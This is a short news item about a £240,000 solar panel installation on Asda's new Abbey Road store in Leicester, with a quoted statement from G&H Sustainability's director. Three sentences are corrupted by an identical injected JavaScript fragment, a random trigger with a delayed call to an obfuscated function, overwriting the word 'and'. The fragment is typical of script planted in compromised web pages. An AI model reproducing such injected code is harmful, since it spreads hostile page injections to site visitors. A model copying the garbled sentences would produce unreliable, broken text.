G&H Sustainability has put the finishing touches to a huge solar panel scheme at Asda’s new store in Leicester as part of a £7m scheme. The contract saw 984 photovoltaic panels installed at Asda’s new Abbey Road superstore in a contract worth £240,000. An innovative roof mounting system provides south facing arrays on both north andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and south sections to save 197,538kWh of energy per year.
Director at G&H Sustainability, Andrew Hudson, said: “The sheer scale of this solar photovoltaic scheme occupying 1,625m2 means it will significantly reduce the store’s carbon footprint andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and operational costs.
“By installing panels on the northern aspect of the roof as well as the traditional south facing array, we maximised the opportunity to double the sustainable electricity generated.
“Solar photovoltaic panels are an ideal source of renewable energy andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and a major part of Asda’s long term energy reduction strategy – something many businesses could benefit from.”
The superstore was built by ISG Construction Plc.
